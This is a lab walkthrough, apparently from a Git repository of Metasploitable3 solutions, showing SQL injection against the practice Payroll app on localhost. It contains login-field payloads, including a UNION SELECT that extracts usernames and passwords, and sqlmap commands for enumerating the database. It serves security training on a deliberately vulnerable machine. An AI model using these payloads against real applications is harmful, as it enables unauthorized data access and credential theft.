Marown
/
metasploitable3-solutions
mirror of https://github.com/ACIC-Africa/metasploitable3.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploitable3-solutions/Payroll_App_SQL_Injection_C...

3.3 KiB
Raw Permalink Blame History

For this tutorial you will need the following tools

  • Browser (Prefarably Mozilla)
  • Burpsuite
  • SQLMap
  1. Try and login using the following credentials:
    Field Value
    USERNAME admin
    PASSWORD admin

RESULTS: The webpage will display your username and no content

alt text

alt text 2. Try and login using the following credentials:

Field Value
USERNAME '
PASSWORD admin

RESULTS: The webpage will be blank alt text alt text

  1. Try and login using the following credentials:
    Field Value
    USERNAME ' or 1;#'
    PASSWORD admin

RESULTS: The web page will return all the user content alt text alt text 4. Use SQLMap to extract the database using the following commands:

sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST

RESULTS: SQLMap will identify whether the web application is vulnerable to SQL Injection alt text alt text

  1. Use SQLMap to extract the columns in the table

    sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST --columns

RESULTS: SQLMap will retrieve the columns on the application tables alt text alt text

  1. Use the column names to retrieve the user credentials:
    Field Value
    USERNAME ' or 1 union select 1,username,password,1;#'
    PASSWORD admin

RESULTS: The web page will return the user credentials alt text alt text alt text
alt text